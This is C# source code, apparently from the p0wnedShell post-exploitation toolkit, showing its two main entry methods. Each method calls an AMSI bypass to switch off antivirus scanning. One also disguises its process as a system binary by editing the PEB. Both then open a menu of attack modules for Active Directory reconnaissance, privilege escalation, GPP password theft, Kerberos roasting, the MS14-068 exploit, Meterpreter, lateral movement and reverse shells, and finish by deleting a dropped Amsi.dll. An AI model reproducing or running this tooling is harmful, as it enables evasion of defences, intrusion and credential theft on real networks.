public static void Entry() { string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE"); string LatestOSVersion = "6.3"; decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture); if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec) { string MasqPath = p0wnedShellOpsec.masqBinary.Remove(p0wnedShellOpsec.masqBinary.LastIndexOf(@"\")).ToLower(); string SystemPath = Environment.SystemDirectory.ToLower(); AmsiBypass.Amsi(Arch); if (p0wnedShellOpsec.AutoMasq && MasqPath == SystemPath) { // Starting Runspace before we Masquerade our Process Pshell.P0wnedListener.Execute("Write-Host '[+] AMSI Bypassed'"); } } if (p0wnedShellOpsec.AutoMasq || ConsoleEx.IsInputRedirected || ConsoleEx.IsOutputRedirected) { Console.WriteLine("[+] Auto Masquerade our Process to: {0}", p0wnedShellOpsec.masqBinary); if (!PEBMasq.MasqueradePEB(p0wnedShellOpsec.masqBinary)) { Console.WriteLine("[!] Auto Masquerade Failed :("); } } if (!p0wnedShellOpsec.AutoMasq) { Console.Title = "p0wnedShell - PowerShell Runspace Post Exploitation Toolkit"; } if (!ConsoleEx.IsInputRedirected || !ConsoleEx.IsOutputRedirected || !ConsoleEx.IsErrorRedirected) { Console.SetWindowSize(Math.Min(120, Console.LargestWindowWidth), Math.Min(55, Console.LargestWindowHeight)); } int userInput = 0; do { userInput = DisplayMenu(); switch (userInput) { case 1: Pshell.PowerView(); break; case 2: SitAwareness.Menu(); break; case 3: Pshell.PortScan(); break; case 4: Execution.Menu(); break; case 5: Pshell.PowerUp(); break; case 6: GetSystem.Menu(); break; case 7: Inveigh.Menu(); break; case 8: Pshell.GetGPPPassword(); break; case 9: Roast.Menu(); break; case 10: ADAttacks.Menu(); break; case 11: Exploits.Menu(); break; case 12: if (Arch == "x86") { Pshell.MS14_068(); } else { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("\n[+] Sorry this option only works for p0wnedShellx86\n"); Console.ResetColor(); Console.WriteLine("Press Enter to Continue..."); Console.ReadLine(); } break; case 13: p0wnedMeter.Menu(); break; case 14: LatMovement.Menu(); break; case 15: PowerCat.Menu(); break; case 16: Pshell.InvokeShell(); break; default: Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("\nSee you later Alligator ;)"); Console.ResetColor(); break; } } while (userInput != 17); string TempFolder = Path.GetTempPath(); if (File.Exists(TempFolder + "\\Amsi.dll")) { File.Delete(TempFolder + "\\Amsi.dll"); } }
public static void Main() { Console.Title = "p0wnedShell - PowerShell Runspace Post Exploitation Toolkit"; Console.SetWindowSize(Math.Min(120, Console.LargestWindowWidth), Math.Min(55, Console.LargestWindowHeight)); string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE"); string LatestOSVersion = "6.3"; decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture); if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec) { AmsiBypass.Amsi(Arch); } int userInput = 0; do { userInput = DisplayMenu(); switch (userInput) { case 1: Pshell.PowerView(); break; case 2: SitAwareness.Menu(); break; case 3: Pshell.PortScan(); break; case 4: Execution.Menu(); break; case 5: Pshell.PowerUp(); break; case 6: GetSystem.Menu(); break; case 7: Inveigh.Menu(); break; case 8: Pshell.GetGPPPassword(); break; case 9: Roast.Menu(); break; case 10: ADAttacks.Menu(); break; case 11: Exploits.Menu(); break; case 12: if (Arch == "x86") { Pshell.MS14_068(); } else { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("\n[+] Sorry this option only works for p0wnedShellx86\n"); Console.ResetColor(); Console.WriteLine("Press Enter to Continue..."); Console.ReadLine(); } break; case 13: p0wnedMeter.Menu(); break; case 14: LatMovement.Menu(); break; case 15: PowerCat.Menu(); break; case 16: Pshell.InvokeShell(); break; default: Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("\nSee you later Alligator ;)"); Console.ResetColor(); break; } } while (userInput != 17); if (File.Exists(Program.P0wnedPath() + "\\Amsi.dll")) { File.Delete(Program.P0wnedPath() + "\\Amsi.dll"); } }